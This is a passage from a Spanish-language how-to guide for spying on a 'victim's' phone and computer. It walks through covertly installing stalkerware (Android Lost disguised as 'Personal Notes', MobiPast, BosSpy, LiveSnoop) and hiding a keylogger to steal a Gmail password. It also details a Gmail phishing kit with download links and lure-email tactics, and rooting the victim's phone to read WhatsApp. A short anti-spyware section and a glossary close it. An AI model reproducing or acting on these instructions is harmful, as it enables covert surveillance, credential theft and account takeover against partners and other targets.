una cuenta con el mismo Gmail de la víctima. Solo debemos pulsar el botón “Registrar” que está situado en la esquina superior derecha de la pantalla. Paso 4: Ya ingresada la cuenta de Gmail, podemos acceder a los controles que nos permitirán manejar todas las funciones que queramos manejar, como las ya mencionadas anteriormente. Las imágenes a continuación mostrarán solo una parte de todo lo que puedes hacer en cada una de las secciones. l Page | 49 Page | 50 Page | 51 Page | 52 Desinstalación: Para la desinstalación de la aplicación, deberemos tener el teléfono a mano para ir a las configuraciones. Vamos a la parte de Seguridad “Security”. Estando en “Security”, vamos a la parte llamada “Device administrators” (Administradores de dispositivos). Allí encontraremos las aplicaciones que tiene autoridad sobre el sistema Android, entre ellas, obviamente, la ya instalada Android Lost que se oculta bajo el nombre “Personal Notes”. Pulsamos la casilla para anularla, de esa manera ya podemos desinstalarla como si fuera una aplicación como cualquier otra. Page | 53 Vamos a la sección de aplicaciones descargadas donde veremos la aplicación Personal Notes… La desinstalamos pulsando Uninstall. Page | 54 Cell Tracker: Cell Tracker te permite realizar un seguimiento de los lugares a donde quiera que esté visitando, su propio celular o el de la víctima. Solo pones intervalos de tiempo para registrar la ubicación y guardarlo en la base de datos, y puesta en el rastreador celular. Al final del día se puede comprobar cuáles lugares fueron visitados con ubicaciones guardadas en google maps. Descárgala de Google Play. Características fundamentales Cell Tracker le permite ver su ubicación con fecha e historial. Cell Tracker es una interfaz de usuario sencilla y gráfica que actúa como dice. Cell Tracker es completamente gratis para descargar. Requisitos Teléfono Android Compatible Interfaces Lista de ubicaciones Rastreo con Google Maps Page | 55 Trazos de las ubicaciones recorridas Page | 56 Métodos de Espionaje para iPhone Si tenemos un iPhone, deberíamos saber que existen programas que desbloquean el Sistema operativo del teléfono, habilitándolo para reconocer aplicaciones no le pertenecen, o más bien, que no fueron diseñadas para que fuera compatible con él. Es por esto que cuando se trata de aplicaciones de espionaje, es de suma importancia conocer el “Jailbreaking” y en qué consiste, ya que es lo permitirá la instalación de la mayoría de aplicaciones; si ya lo sabe, puede continuar; si no, es recomendable que se dirija al Apéndice Software y Términos para conocerlo a detalle. Procedemos a ejecutar el “Jailbreak”. Tutorial TaiG Jailbreak para iOS 8: Este es uno de los softwares gratuitos disponibles para hacer Jailbreak a nuestro Iphone. Página oficial de descarga: http://www.taig.com/en/ Dispositivos compatibles: iPhone 4S- 6plus; iPad / iPad Aire / 2; iPad Mini / mini2 / MINI3; iPod touch 5. Para los usuarios de iOS8.1.3, por favor utilice la herramienta de actualización de firmware Taig para primero actualizar tu sistema a iOS8.2 Beta1, 2 y utilizar Taig Jailbreak. Paso 1: Confirmar que la versión iOS del dispositivo sea 8-8.1.2 o 8.2 beta. Verifique la versión a través de: Settings > General > About > Version Si por casualidad el proceso de Jailbreak falla descargue la última versión del Firmware y flasheala. Luego vuelve a intentar el Jailbreak. Paso 2: Hacer una copia de seguridad Por favor, usa iTunes para hacer una copia de seguridad de tus datos en caso de pérdida innecesaria. Paso 3: Desactivar bloqueos de contraseña Antes de hacer Jailbreak, por favor asegúrate de desactivar toda contraseña que hayas puesto en el teléfono, también fundamentalmente desactiva la función "Find My iPhone". O el Jailbreak fallará. 1. Apaga el código de acceso a través de: Settings (Configuraciones) – Passcode (Código de acceso) - Turn Passcode Off (Apagar código de acceso) 2. Apague "Find my iPhone" a través de: Settings (Configuraciones) - iCloud - Find my iPhone Haga clic para desactivar. Paso 4: Descarga y abre la Taig Jailbreak Tool para iOS8, haga clic en el botón "Start", y el programa se ejecutará de forma automática, no necesita otra operación. Durante el Jailbreak, por favor, mantenga la conexión al dispositivo estable y espere pacientemente. Page | 57 Después del Jailbreak, el dispositivo se reiniciará automáticamente. A continuación, puede ver el resultado. Abra su dispositivo, Cydia se muestra en la pantalla, y jailbreak untether está acabado. Ahora puedes disfrutar libremente con su iPhone desbloqueado. Page | 58 Jailbreak para otras versiones iOS Existen otros softwares gratuitos de ayuda para hacer Jailbreak en los demás sistemas iOS más antiguos, he aquí una lista para que te guíes a conseguirlos si los necesitas: iOS 5… Software: Redsn0w iOS 6… Software: Evasi0n iOS 7… Software: Evasi0n Guía para todas las versiones iOS Existe una guía para hacer Jailbreak paso por paso para cualquier iPhone, echa un vistazo al link. http://ijailbreakguide.com/ Page | 59 Ejecutando Android en iPhone: Todo lo que necesitas para empezar es un dispositivo iOS; En este momento, el iPhone 3G tiene el mejor apoyo, y eso es lo que estamos utilizando en esta guía. Paso 1: Ejecutamos el Jailbreak en Iphone. Tienes varias opciones, incluyendo jailbreaking Pwnage Tool, Redsn0w y Blackra1n. Elige la que trabaje en tu plataforma, descárgala, y sigue del proceso de jailbreak. Paso 2: Instalar Bootlace en Cydia Para ello, tendrás que lanzar Cydia desde la pantalla de inicio, pulse sobre el botón “Manage”, seleccione “Source”, a continuación, pulse “Edit” y luego “Add”. El repositorio que tendrás que añadir es repo.neonkoala.co.uk. Tocamos “Add Source”, deje a Cydia hacer su magia, y luego toque en su repositorio recién agregado e instale “Bootlace”. Paso 3: Ejecutar Bootlace y el parche Kernet Deja Cydia, y lanza Bootlace. Si Bootlace no está en la pantalla de inicio después de salir de Cydia, reinicie el iPhone y debería aparecer. Entonces sólo lanzamos Bootlace, y se deja descargar y parchear el kernel. Cuando haya acabado, pulse Reiniciar y espere a que el teléfono se reinicie. Page | 60 Paso 4: Ahora lance el Bootlace de nuevo. Pulse el botón Openiboot y pulse “Install”, entonces “Continue”. Opniboot se descargará e instalará. Paso 5: Instalar iDroid Una vez OpeniBoot está instalado, pulse sobre el botón iDroid, toque Instalar, OK, y luego esperar. iDroid-que es esencialmente el sistema operativo Android personalizado para su iPhone- se descargará e instalará. Esto tomará un tiempo, así que tenga paciencia, y si la batería se debilita, es posible que desees conectar tu teléfono antes de empezar. Paso 6: Reiniciar y jugar con el Android Ahora que has instalado Android en tu iPhone. Hora de jugar un rato con él. Sólo tienes que pulsar en el botón QuickBoot desde el interior de Bootlace, pulse el icono de Android (el del pequeño Android que sostiene la manzana con orgullo), y confirme que desea reiniciar en Android. ¿Cómo funciona? Lo primero a destacar es que Android en el iPhone no está tan cerca o listo para usarse como su sistema operativo original de tiempo completo. Eso no quiere decir que nunca será, pero por el momento, esto es algo más que te gustaría hacer para cumplir con tu curiosidad, y probar unas cuantas aplicaciones android útiles. Page | 61 El iPhone 3G es el mejor dispositivo iOS compatible (y de momento sólo él y el 2G trabajan con el método anterior, creo). El mayor problema en este momento con el 3G es la administración de energía (PMU en el wiki), que no es completamente funcional. Lo más importante, la suspensión de la batería aún no está disponible, por lo que su batería puede no durar mucho. Page | 62 Mobipast: Tutorial paso a paso de una de las mejores aplicaciones gratis de espionaje para Smartphone. Debe instalarse en controlador en tu celular, y el software espía en el celular de la víctima. A continuación los pasos. Requisitos Smartphone iPhone/Android Conexión internet constante Características • • • • Rastreo de ubicación por GPS Historial de Internet Captura de código de seguridad de los bloqueos Registro de lista de contactos Descarga de la aplicación iPhone Paso 1: Abra la aplicación Cydia Page | 63 Paso 2: Seleccione “Manage” Paso 3: Selecciones “Sources”. Paso 4: Pulse el botón “Edit” Page | 64 Paso 5: Pulse el botón “Add”. Paso 6: Introducimos el link 123.mobilpast.com y luego pulsamos “Add Source” Paso 7: Esperemos un momento y luego pulsamos el botón que aparecerá, “Return to Cydia”. Page | 65 Paso 8: Seleccione la línea 123.mobipast.com Paso 9: Seleccione la aplicación MobiPast Paso 10: Pulse el botón “Install” Page | 66 Paso 11: Pulse el botón “Confirm” Paso 12: Espere unos segundos y pulse el botón “Restart SpringBoard” Ya está instalada la aplicación, pudes ver su ícono. Page | 67 Paso 13: Abrimos la aplicación y vamos a nuestra cuenta. Paso 14: Pulse el botón “Log In” para ingresar Paso 15: Ingrese una dirección de correo electrónico verdadera y contraseña de Gmail o Yahoo (le recomendamos que cree una dirección de correo electrónico Gmail o Yahoo sólo para recibir datos de MobiPast) y pulse el botón “Ok” Page | 68 Descarga del Software de espionaje iPhone Para descargar el software de monitoreo solo debe seguir los pasos anteriores del Paso 1 al Paso 9, que es cuando elegimos el archivo de instalación: Con la excepción de que elegiremos el software de monitoreo… Seguimos los demás pasos como anteriormente hasta que llegamos a esta pantalla, que es justo cuando reiniciamos el dispositivo después de haber instalado. Nos vamos a buscar iPhone e introducimos el código secreto que es “123456” y pulsamos “Buscar”. Page | 69 Pulsamos el botón “Sign In” Ingresamos el mismo correo electrónico que anteriormente para iniciar sesión. Tiene que ser verdadero. Pulsamos Quit y dejamos que la aplicación comience a hacer su trabajo automáticamente, comenzarás a recibir tu primer informe dentro de 30 minutos. Page | 70 BosSpy: Bosspy, es el primer software espía para Iphone 100% gratuito. Es un keylogger freeware para iphone, ipad, ipod, teléfono y tablette Android. Características fundamentales El keylogger incluye las opciones: o Seguimiento de la ubicación de las personas que desea espiar o Leer el contenido de los mensajes y descubrir la verdad o Obtener una copia del historial de llamadas o Keylogger para iPhone, iPad, iPod Touch, Android (captura cualquier contraseña). Después de eso, podrás recibir directamente por correo electrónico a cada hora el informe keylogger, contiene todos los mensajes de chat WhatsApp, yahoo, y Skype. Puedes capturar cualquier contraseña, de facebook, correo yahoo, gmail, hotmail, etc ... Guía de Instalación Sigue estos procedimientos para instalar el software en el dispositivo determinado. Paso 1: Inicie la aplicación Cydia. Paso 2: Pulsamos el botón “Manage” Page | 71 Paso 3: Selecciona “Sources” (Si no ves esa pantalla ve directamente al siguiente paso). Paso 4: Presione el botón “Edit” Paso 5: Presione el botón “Add”. Page | 72 Paso 6: Introduzca el link 1mole.bosspy.com y pulse sobre el botón “Add Source.” Paso 7: Espera unos minutos y luego pulsa en el botón “Return to Cydia.” Paso 8: Selecciona la línea 1mole.bosspy.com Page | 73 Paso 9: Ahora pulse la entrada Smartphone. Paso 10: Pulse el botón “Install” Paso 11: Presione el botón “Confirm” Page | 74 Paso 12: Espere unos segundos. Pulse el botón OK para permitir 1mole localizar el teléfono, entonces toque en el botón de reinicio del dispositivo. Paso 13: En cualquier momento puedes visualizar el menú para acceder a tu cuenta Bosspy. Ir a la pantalla de búsqueda y escriba 123456, pulsa el botón “Search”. Paso 14: La interfaz aparecerá (si la interfaz no aparece, por favor reinicie de nuevo el dispositivo). Para acceder a tu cuenta Bosspy, toca en el botón “Sign In”. Page | 75 Paso 15: Introduzca la dirección de correo electrónico y contraseña de su cuenta Bosspy, pulse el botón OK. Paso 16: Tienes las opciones para ocultar Cydia o desinstalar 1mole si no necesitas supervisar más. Page | 76 Métodos de espionaje para PC Ahora vamos a tratar lo que es el espionaje de celular a PC y de PC a PC. Livesnoop: LiveSnoop es un servicio de vigilancia diseñado para el monitoreo de infantes basado en almacenamiento en internet. ¿Si estás preocupado(a) por lo que tu hijo está haciendo en Internet? LiveSnoop es una excelente opción. Proporcionan un servicio de monitoreo que permite a los padres para ver información detallada acerca de todo lo que sus hijos hacen en línea. Mejor aún, los padres pueden recibir alertas instantáneas sobre la base de la actividad de sus hijos. Las características básicas de este servicio son absolutamente gratis y empezar sólo toma unos pocos minutos! Características fundamentales Monitoreo en Tiempo Real Revise el uso de Internet de su hijo desde cualquier dispositivo, como sucede y cuando sucede. Recibe alertas instantáneas cuando se detecta actividad peligrosa. Interfaz de Usuario Moderna Interfaz intuitiva basada en Web que muestra eventos fáciles de entender en la línea de tiempo. Diseño de respuesta permite el acceso desde prácticamente cualquier dispositivo con un navegador web. Actualizaciones sin problemas Una vez instalado el cliente LiveSnoop, se actualiza automáticamente a la versión más reciente. Las actualizaciones se incluyen sin costo adicional. Page | 77 Tutorial Livesnoop Creamos una cuenta en la página oficial pulsando el botón “Create Account”: https://livesnoop.com/ Si ya tenemos una cuenta, pulsamos “Get Started” en la página de inicio y ponemos nuestro correo electrónico en sección Sing In, pulsamos el botón para ingresar. Page | 78 Una vez iniciamos sesión en nuestra cuenta ya creada, vemos estas opciones en la siguiente imagen. Premium: Compara las características gratuitas con las Premium Device Info: Ver la información de los dispositivos monitoreados Install: Para instalar el software en un dispositivo Help: Obtenga ayuda Activity: Vea la actividad de los dispositivos registrados Device Settings: Cambiar configuraciones de tus dispositivos Remove Device: Remover Livesnoop de un dispositivo. Sign Out: Salir Alerts: Ver las alertas generadas por tus dispositivos Account Settings: Cambiar configuraciones relacionadas con la cuenta Support: Contacte el servicio técnico Livesnoop Nos dirigimos a la parte “Install” para instalar el software de espionaje en la computadora víctima. Ahí veremos las instrucciones. Elegimos para Windows ya que para Android todavía no está disponible. Page | 79 A continuación aparecerán dos opciones, que son “Instalar en este dispositivo” e “Instalar en otro dispositivo”. En ambos casos aparecerán las instrucciones de cómo hacerlo. Cuando instalamos en otro dispositivo, solo debemos descargar el software pulsando el botón “Download Client”, luego tomamos la descarga y la llevamos al dispositivo víctima, ya sea por correo o en una memoria en instalamos. La instalación no se notará ya que es totalmente invisible, así que no te preocupes si no la ves. Inmediatamente la PC pedirá un reinicio, lo aceptamos. Page | 80 Cuando vamos a la parte de Activity vemos los registros de las actividades de los dispositivos monitoreados. A la izquierda vemos la lista de dispositivos agregados, en esta imagen contamos solo con uno, llamado Cristología-PC. Y de esta manera hemos tomado el control de esa PC, así de sencillo. Page | 81 Revealer Keylogger Free 2.0: Revealer Keylogger es un potente algoritmo que puede grabar todo lo que se escribe en el teclado, incluyendo contraseñas, independientemente de la aplicación utilizada (Skype, Facebook, MSN, AOL, ICQ, AIM, GTalk, etc.). Este software, en el caso de espiar celulares, podría utilizarse como poderosa estrategia para capturar la cuenta Gmail de cualquier persona a la cual tengas acceso a su computadora. Basta con instalar el software y ocultarlo, que de por sí es difícil de detectar. Requisitos Una PC de cualquier tipo de sistema operativo Acceso a ella (ya sea por algún descuido de la víctima, o que conozcas la contraseña para acceder) Dónde descargarlo http://www.logixoft.com/ Paso 1: Vamos a la página principal, pulsamos el botón de descarga “Free Download”. Page | 82 Nos redirigirá a una página externa llamada “download.cnet.com”, no hay problema, es normal. Es ahí donde la descarga se iniciará automáticamente. Paso 2: Una vez la descarga esté completada, buscamos el archivo en la carpeta de descarga. Lo ejecutamos. Nota: Puede ser que el antivirus lo detecte como archivo malicioso, es normal, ya que este software de por sí es malicioso, está diseñado para robar toda información que sea digitada por el teclado; pero esa es la idea, para poder obtener la cuenta de Gmail de la víctima. Nos aparecerá una ventana como esta en la cual tenemos dos opciones, Instalar ahora, que es la primera, o Personalizar. Si queremos que el software quede totalmente oculto, vamos a instalar ahora; aunque no te lo recomiendo totalmente pues queda tan bien ocultado que se dificulta encontrarlo. Lo mejor es la opción “Customize”; ya que así podemos elegir ponerla en el escritorio a modo de prueba y luego moverla y esconderla donde queramos. Page | 83 Paso 3: Para abrir la aplicación, sencillamente pulsamos las teclas Ctrl + Alt + F9 para abrirla como un atajo. También podemos dar doble click en el ícono de la aplicación que aparece en escritorio. Vamos a pulsar el botón que está en la esquina superior izquierda de la pantalla, llamado “Start”, con el cual daremos inicio al espionaje. Al cabo de un minuto, el programa estará registrando información de todo lo que se digite con el teclado. Como puedes ver en la siguiente imagen, al lado derecho se muestran los registros de todo lo que se ha digitado, tanto en el buscador Google, como en documentos Word, también en el traductor de Google. Paso 4: Procedemos a ocultar el programa en alguna parte extraña del computador, que difícilmente la víctima revise. Entonces inventamos algún tipo de estrategia o excusa para que la víctima termine ingresando a su cuenta de Gmail. En algún momento de descuido, podemos acceder al computador y abrir el programa, quien nos estará diciendo todo lo sucedido. Entre la información recaudada, buscaremos la que se relacione con la cuenta de Gmail, capturamos y guardamos la contraseña, con la cual accederemos y completaremos el espionaje a su celular. Page | 84 Métodos de Phishing (Hack de correos y contraseñas) El término Phishing puede aplicarse a una buena variedad de métodos utilizados para obtener de manera fraudulenta información personal confidencial, como correos, contraseñas e información bancaria, entre otras cosas. Ahora bien, volvemos a dejar claro algo. Lo que vas a aprender aquí, es solo con el propósito de obtener el Gmail de la víctima con el propósito de instalarle una aplicación espía remotamente, y de esta manera tomar control de los datos del teléfono. Esto solo se debe emplear por motivos de protección y recaudación de información por motivos de ansiedad y desconfianza amorosa. Sin embargo, aunque sea por ese motivo, la práctica sigue siendo ilegal. Por lo cual cada quien es responsable de lo que haga con esta información, presentada acá por motivos educacionales. Tutorial ¿En qué consiste el Phishing en esta ocasión? Consiste en utilizar una página falsa (que será nuestro dominio), que sea idéntica a la página original de acceso a Gmail. De esta manera confundiremos a nuestra víctima, la cual probablemente ingrese sus datos creyendo que está accediendo a la página principal Gmail, pero en realidad está ingresando sus datos en nuestro dominio, por lo cual su correo y contraseña será nuestro. Debemos asegurarnos de que la víctima ingresa la cuenta de Gmail vinculada a su teléfono Android, de esta manera podremos instalar las aplicaciones espías desde la página de Google Play remotamente. ¿Cómo lo haremos? Simplemente siga los pasos a continuación y le aseguramos que su Phishing estará listo 100% exitosamente. Page | 85 Paso 1: Crear un dominio, ya sea gratis o pago. Es bastante fácil. Solo debes dirigirte a páginas donde brinden este servicio gratuito y registrarte, así de sencillo. En caso de que se te esté dificultando hacerlo en una de estas páginas, puedes probar otras páginas que de igual manera funcionarán y ver tutoriales en YouTube de cómo crear un dominio, hay muchos tutoriales de eso. Page | 86 Paso 2: Una vez creado el dominio, descargamos el cliente FileZilla, que es un programa que nos permitirá transferir directamente nuestros archivos de configuraciones a nuestro dominio. http://filezilla.uptodown.com/ Paso 3: Instalamos el programa. En caso de que no sepa véase un tutorial en YouTube. Paso 4: Vinculamos nuestro dominio con el FileZilla. Para vincularlo, debemos ingresar los datos del dominio en el FileZilla. Todos los datos de tu servidor se te otorgarán en el momento en que te registres, no que de qué preocuparse. Esos datos son: el usuario, la contraseña, y la dirección del dominio en sí. Como vemos en la siguiente imagen, las casillas que deberemos llenar aparecerán en la parte de arriba de la interfaz del FileZilla. Donde dice “Servidor” pondremos la dirección de nuestro servidor como está en este ejemplo. “Nombre de Usuario” nuestro nombre de usuario. Y luego la casilla contraseña. El puerto lo podemos dejar vacío. Pulsamos “conexión rápida” para ingresar a nuestro servidor. Page | 87 Paso 5: Colocamos los archivos que están en la carpeta especial que te entregaremos. Como puedes ver a continuación, el FileZilla viene con su interfaz vacía. La carpeta en donde subiremos los archivos es en la llamada “Public HTML”, en la parte que está debajo. Sencillamente arrastramos los archivos ahí. (Los archivos de estos links están comprimidos, en caso de que no sepas cómo descomprimirlos, echa un vistazo al Apéndice Winrar al final de esta guía). Descarga la carpeta que contiene los archivos aquí: http://www.mediafire.com/download/kwxq1qww5etkdl4/Gmail+Script.rar https://mega.co.nz/#!exonSIRI!Xn3ZhFWkxU7HM-3743enn4NPTkNxRa3QPXk5mNMuoxM Page | 88 Paso 6: Arrastramos los archivos al FileZilla, a la carpeta Public HTML. Tu FileZilla ahora se verá de esta manera: Page | 89 Paso 7: Copiamos la dirección de nuestro dominio y la pegamos en nuestro buscador, ahí veremos que nuestra página tiene el diseño de Gmail. Paso 8: Ahora lo que debemos hacer es utilizar algún tipo de estrategia para hacer que la víctima ingrese a su cuenta de Gmail. Cuando acceda, los datos que ingrese serán nuestros y nos aparecerán en un archivo de texto entre los archivos del FileZilla. Específicamente en el archivo llamado datos_sv como puedes ver en la imagen. Lo abrimos, y ahí tenemos el usuario y la contraseña para acceder. Entre las estrategias que podemos utilizar, podemos mencionar que una muy efectiva es enviar un correo con aspecto y escritura muy profesional avisando de que hay riesgos de perder la cuenta de Gmail, que debe acceder a su cuenta de inmediato para evitar que sea cancelada; o te puedes inventar cualquier otra estrategia que sea igual o más convincente que esta. Entonces enviamos el link junto con el correo para que ingrese sus datos ahí, en nuestro dominio falso. Si cae, entonces la operación fue un éxito y podrás instalarle aplicaciones mientras duerme, sin importar en cuál país del mundo esté. (Véase la parte Espiar Celulares a Distancia para saber cómo instalar aplicaciones remotamente). Page | 90 Software Anti-Spyware ¿Y si somos nosotros que estamos siendo espiados? Es una muy buena pregunta, ya que en este libro has aprendido cómo espiar, entonces es relevante preguntar en sentido inverso, ya que sí existe la posibilidad de que estemos siendo espiados. Existen aplicaciones para defendernos. Anti Spy Mobile Free: Es un escáner Gratuito de software de espía que detecta y elimina las aplicaciones de espía en su Teléfono móvil Android. ¡La aplicación de protección de software de espía es obligatoria para cada equipo! AntiSpy Mobile utiliza técnicas perfeccionadas de detección, CAPACES de identificar INCLUSO software nuevo de espionaje. Solo instalamos desde Google Play y listo, ya tenemos nuestra aplicación. Así se ve su interfaz, se pueden ver los Spywares, Advertencias y las demás aplicaciones. Page | 91 Rooteo de Android (Acceso Root) Esta es la parte en la cual vamos a rootear el móvil de nuestra víctima o el nuestro. El punto de importancia de esta operación, es saber que cuando Rooteamos, estamos liberando al teléfono de las restricciones impuestas por el fabricante, por razones de seguridad. Esto nos permitirá espiar los mensajes de Whatsapp usando la herramienta “DroidJack” situada en la página 29 de esta guía. La aplicación que vamos a usar para rootear nuestro móvil es “King root”, la cual permite rootear cualquier móvil en simples pasos pocos minutos. Nunca había existido una manera más fácil de rootear un móvil que esta! Descargar King Root: https://mega.nz/#!jkIU0brT!7GF2do7tcV3g5T9dfyB9y9taOQfNZIu6fhPgbWdPI4 Tutorial King Root: Este tutorial te mostrará paso por paso cómo hacerlo en cualquier Android. Este tutorial comienza a explicar justo después de haber descargado el archivo, ya sea directamente o que haya sido pasado de PC a celular modo USB. Paso 1: Vamos a la carpeta donde hemos puesto el archivo apk de Kingroot que descargamos en el enlace anterior y lo ejecutamos. Page | 92 Paso 2: Completamos la instalación con cualquier instalador. (Recuerde que debe tener la opción “Instalar de Fuentes desconocidas” activada, esa opción se encuentra en las configuraciones de seguridad de todos los Android) Paso 3: Pulsamos instalar para comenzar la instalación. Paso 4: Abrimos la aplicación y nos aparecerá una ventana como esta. Page | 93 Paso 5: Esta pantalla inicial y de otro modelo de pantalla, es lo que aparece al momento de abrir la aplicación, cuando ya hemos leído la introducción que aparece en la imagen anterior de este artículo. Pulsamos el botón “Try to root.” Paso 6: Esperamos a que termine de Rootear, el cual será un proceso mostrado con medidas de porcentaje como se puede ver en la imagen. El Purify es una función que viene junto a esta aplicación la cual permite limpiar el móvil de consumo de memoria Ram innecesario. Evitando que aplicaciones que no se están usando el momento salga a flote consumiendo la capacidad del móvil. Esto es opcional, si purificas o no el móvil, de todas formas podremos espiar. Page | 94 Pulsamos el botón “Done” para finalizar. He aquí el menú normal de la aplicación, solo tenemos que cerrarla y salir de ella. Tenemos en el escritorio 2 aplicaciones, cada vez que queramos purificar usamos Purify, la otra es sencillamente la instalación. Page | 95 Paso 7: Buscamos en Google Play el Root Checker, el cual nos permitirá verificar si realmente somos Root. Esto es solo un escáner. La instalamos. Paso 8: Abrimos la aplicación una vez instalada y pulsamos el botón “Verify Root”. Como podemos ver, el dispositivo ha sido confirmado como Root. Ahora en este móvil somos libres espiar Whatsapp cuantas veces queramos, entre otras funciones que conocerá en la página 29 de esta guía. Page | 96 Apéndice: Software y Términos SpywareBlaster: SpywareBlaster es una utilidad para PC y Laptops especialmente diseñada para evitar que le espíen, que vacuna los navegadores frente a programas maliciosos. Más en concreto, SpywareBlaster añade cookies y controles ActiveX a las listas negras de Internet Explorer y Firefox, y restringe el acceso a páginas peligrosas. SpywareBlaster dispone también de herramientas tan útiles como un creador de instantáneas de sistema -imprescindible para deshacer cambios- y un gestor de copias de seguridad del fichero hosts, que contiene la configuración de red de Windows. Incluso hay un eliminador de Flash. Requisitos Los requisitos son muy mínimos, casi cualquier computadora lo puede ejecutar exitosamente. Es compatible con la mayoría de versiones de sistemas operativos también. Liviano y fácil de usar. ¿Dónde conseguirlo? Se consigue casi en cualquier parte de internet, ya que es totalmente gratis. Es recomendable descargarlo de páginas reconocidas para evitar posibles inconvenientes con infecciones virales entre otros. En mi caso, lo descargué de la página Softonic.com. Puede ver en las siguientes imágenes, paso por paso cómo fue el procedimiento. Paso 1: Como ve en la primera imagen, basta con pulsar el botón “Descargar Gratis”. Page | 97 Paso 2: Luego de haber descargado, vamos a la carpeta de descarga, donde encontraremos el instalador con su respectivo nombre, “SpywareBlaster”. Hacemos doble click para comenzar la instalación. Paso 3: La instalación se verá de esta manera, como usualmente se instala un programa común. Page | 98 Paso 4: Procedemos a aceptar los términos y condiciones para poder continuar. Paso 5: Luego elegimos en parte de nuestra PC se alojará. Pulsando el botón “Browse” o “Examinar” podemos elegir la carpeta donde queremos que se instale. Es recomendable dejarla en la carpeta que está por defecto. Pulsamos “Next” para continuar. Page | 99 Terminando instalación… Paso 6: Luego se te da la bienvenida al programa, donde te explican en qué consiste cada característica fundamental. Pulsamos “Next”. Page | 100 Paso 7: Luego nos aparece una pantalla donde podemos elegir la opción de actualización que queramos. La que dice “Automatic Updating” es para actualización automática del programa. La que dice “Manual Updating” es para actualizar el programa nosotros mismos cuando queramos. Paso 8: Una vez terminado, pulsamos “Finish” para finalizar la bienvenida. Page | 101 Paso 9: Luego aparecerá un Popup por sí mismo, se abrirá una pestaña Web. En esa pestaña encontramos más información acerca de cómo funciona y cuáles son las diferencias entre la versión gratuita y la comprada. Paso 10: En la parte inicial del software pulsamos la opción que aparece en la parte baja, llamada “Enabling All Protection”, para activar la protección total del sistema. De ahora en adelante sus seguridad anti espionaje habrá incrementado. Page | 102 Apéndice: Software y Términos Conozca la definición de cada cosa que decimos que usted no entienda a plenitud. Esta es la parte informativa de algunos detalles muy importantes, busque lo que necesite saber. Cydia: Es una aplicación de software para iOS que permite a un usuario encontrar e instalar los paquetes de software en los dispositivos iOS de Apple jailbreak como el iPhone, el iPod Touch y el iPad. También hace referencia a la plataforma de distribución digital de software en iOS que accede a través del software Cydia. La mayoría de los paquetes de software disponibles a través de Cydia son gratuitos, pero algunos requieren de compra. Cydia es desarrollado por Jay Freeman (también llamado "saurik") y su compañía, SaurikIT. El nombre "Cydia" es una alusión al gusano de la manzana, con un nombre científico de Cydia pomonella, que es el gusano proverbial "en la manzana." Propósito y Funcionamiento Cydia proporciona una interfaz gráfica de usuario para los usuarios con jailbreak utilizando repositorios Advanced Packaging Tool (APT) para instalar el software disponible en la App Store. Aunque algunos pueden encontrar esto útil, pero también puede poner en peligro a los usuarios del dispositivo. Dado que los usuarios tienen que hacer jailbreak a su dispositivo para instalar Cydia y sus paquetes, esto deja una abertura para que cualquier malware se instale en el dispositivo, por lo general por los PDF o paquetes infectados. Cydia se basa en APT, portando a iOS como parte del proyecto Telesphoreo de Freeman. Los paquetes de software se descargan directamente en a un dispositivo iOS, a la misma ubicación que las aplicaciones preinstaladas de Apple, al directorio /Applications. Dispositivos con jailbreak también pueden todavía comprar y descargar aplicaciones normalmente desde la App Store oficial. Algunas herramientas de jailbreak (cada una de ellas compatibles a un conjunto específico de dispositivos y versiones de iOS) instalan Cydia de forma automática, mientras que otras ofrecen una opción para el usuario. Page | 103 Jailbreak (iOS): Se denomina Jailbreak (literalmente: "fuga de la cárcel", en español: "destraba") al proceso de suprimir algunas de las limitaciones impuestas por Apple en dispositivos que utilicen el sistema operativo iOSmediante el uso de kernels modificados. Tales dispositivos incluyen el iPhone, iPod Touch, iPad y la Apple TV de segunda generación. El jailbreak permite a los usuarios acceder por completo al sistema operativo, permitiendo al usuario descargar aplicaciones, extensiones y temas que no estén disponibles a través de la App Store oficial. Un dispositivo con jailbreak todavía puede usar la App Store, iTunes y todas las demás funciones, como hacer llamadas telefónicas. El jailbreak es una forma de escalado de privilegios, y el término se ha usado también con otros sistemas computacionales. A diferencia del proceso de rootear un dispositivo Android, el jailbreak es necesario si el usuario quiere correr software no autorizado por Apple. Un jailbreak "atado" (tethered, en inglés) requiere que el dispositivo esté conectado a un ordenador cada vez que inicie; un jailbreak "sin ataduras" (untethered, su equivalente en inglés) permite al dispositivo encender sin la asistencia de un ordenador. Bajo el Digital Millennium Copyright Act, el proceso de hacer jailbreak es legal en los Estados Unidos, aunque Apple anunció que la práctica puede violar la garantía. Una de las principales razones para hacer jailbreak es para expandir las características impuestas por Apple y su App Store. La mayoría de las herramientas instalan automáticamente Cydia, un cliente nativo de APT para iOS usado para encontrar e instalar software para dispositivos con jailbreak. Debido a que los programas disponibles a través de Cydia no requieren adherirse a los manuales de estilo del App Store, muchos de ellos no son aplicaciones en sí, sino que son extensiones y modificaciones para el sistema y otras aplicaciones. Los usuarios instalan tales programas para distintos propósitos, como modificaciones de la interfaz, inclusión de características y correcciones varias, y hacer el trabajo de desarrollo en el dispositivo más fácil al proveer acceso al sistema de archivos y herramientas de línea de comandos. El jailbreak no afecta a otras limitaciones impuestas como son la descarga de más de 50/100 megabytes de la Appstore sin conexión WiFi, la imposibilidad de sincronizar más de 5 dispositivos iOS, o no poder compartir una dirección de pornografía por iMessage. Simplemente lo que consigues con el jailbreak es quitar ciertas limitaciones, como por ejemplo instalar temas en el dispositivo, o modificar la interfaz del mismo. Algunos usuarios utilizan Cydia para expresar oposición a la censura que Apple aplica a contenidos a través del proceso de aprobación de aplicaciones: a principios de2010, Apple expulsó una aplicación hecha por Mark Fiore, ganador de un premio Pulitzer, porque "ponía en ridículo figuras públicas", en violación de la sección 3.3.14 del contrato de licencia del programa de desarrollo para iPhone. Más tarde Apple llamó a Fiore y le pidió presentar de nuevo su aplicación para aprobarla. A finales de 2010, Apple bloqueó el uso de aplicaciones que permitían a usuarios donar dinero a organizaciones sin fines de lucro y de caridad. Apple también expulsó una aplicación de WikiLeaks, diciendo que violaba el contrato de desarrolladores. Page | 104 iDroid: El objetivo del Proyecto iDroid es ejecutar el kernel de Linux y el sistema operativo Android de Google para los dispositivos de Apple. Con la utilización de nuestro gestor de arranque 'OpeniBoot', hemos adquirido la capacidad de iniciar el kernel de Linux, por tanto, nos permite ejecutar Google Android y cualquier otro sistema operativo basado en Linux con facilidad. iDroid se distribuye ya sea como un paquete de descarga binario o utilizando la aplicación Bootlace iOS, que permite instalar iDroid y OpeniBoot sin necesidad de un ordenador. Con esto sí es posible ejecutar Android en dispositivos de la Apple. Kali Linux: Kali Linux es una distribución de Linux avanzada para 